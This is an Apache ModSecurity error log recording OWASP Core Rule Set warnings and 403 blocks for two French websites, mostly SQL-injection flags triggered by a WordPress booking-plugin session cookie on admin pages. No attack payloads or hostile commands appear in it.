[Mon May 11 22:30:34.701773 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8ah2Cvzd_nyNfUm8AbwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:35.311115 2026] [security2:error] [pid 1588898:tid 1588914] [client 85.121.126.250:36314] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S6FW67LJTsgN3jQNSwAAAA8"]
[Mon May 11 22:30:35.314210 2026] [security2:error] [pid 1590352:tid 1590414] [client 85.121.126.250:36330] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S61q0G_aXAqWauT8YAAAAJY"]
[Mon May 11 22:30:35.346207 2026] [security2:error] [pid 1605480:tid 1605541] [client 85.121.126.250:36230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8Sx2Cvzd_nyNfUm8AUAAAARM"]
[Mon May 11 22:30:37.325245 2026] [security2:error] [pid 1588898:tid 1588908] [client 85.121.126.250:36302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S6FW67LJTsgN3jQNRwAAAAk"]
[Mon May 11 22:30:37.337217 2026] [security2:error] [pid 1606352:tid 1606423] [client 85.121.126.250:36322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S3o_DFxNSZVmaX3SUwAAAMQ"]
[Mon May 11 22:30:37.861491 2026] [security2:error] [pid 1605480:tid 1605539] [client 85.121.126.250:36334] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8Sx2Cvzd_nyNfUm8AUQAAARE"]
[Mon May 11 22:30:38.838826 2026] [security2:error] [pid 1590352:tid 1590403] [client 85.121.126.250:36256] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI8S61q0G_aXAqWauT8YwAAAIs"]
[Mon May 11 22:30:38.919880 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8ah2Cvzd_nyNfUm8AbwAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:39.131750 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8bx2Cvzd_nyNfUm8AdQAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:39.132089 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8bx2Cvzd_nyNfUm8AdQAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:39.958397 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8bx2Cvzd_nyNfUm8AdQAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:40.336697 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8cB2Cvzd_nyNfUm8AeAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:40.336998 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8cB2Cvzd_nyNfUm8AeAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:40.967835 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8cB2Cvzd_nyNfUm8AeAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:41.241402 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8cR2Cvzd_nyNfUm8AeQAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:41.241694 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8cR2Cvzd_nyNfUm8AeQAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:41.891465 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8cR2Cvzd_nyNfUm8AeQAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:42.134548 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8ch2Cvzd_nyNfUm8AfAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:42.134853 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8ch2Cvzd_nyNfUm8AfAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:42.757369 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8ch2Cvzd_nyNfUm8AfAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:43.017477 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8cx2Cvzd_nyNfUm8AfgAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:43.017868 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8cx2Cvzd_nyNfUm8AfgAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:43.629821 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8cx2Cvzd_nyNfUm8AfgAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:43.839385 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8cx2Cvzd_nyNfUm8AgAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:43.839685 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8cx2Cvzd_nyNfUm8AgAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:44.410718 2026] [security2:error] [pid 1605480:tid 1605530] [client 103.59.161.151:61149] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8cx2Cvzd_nyNfUm8AgAAAAQg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:53.453663 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8faFW67LJTsgN3jQNdwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:53.453959 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8faFW67LJTsgN3jQNdwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:54.697345 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8faFW67LJTsgN3jQNdwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:55.350198 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8f6FW67LJTsgN3jQNegAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:55.350488 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8f6FW67LJTsgN3jQNegAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:55.985691 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8f6FW67LJTsgN3jQNegAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:56.746425 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8gKFW67LJTsgN3jQNgwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:56.746720 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8gKFW67LJTsgN3jQNgwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:57.774811 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8gKFW67LJTsgN3jQNgwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:58.832611 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8gqFW67LJTsgN3jQNhgAAABU"], referer: https://rentparadise.fr/wp-login.php
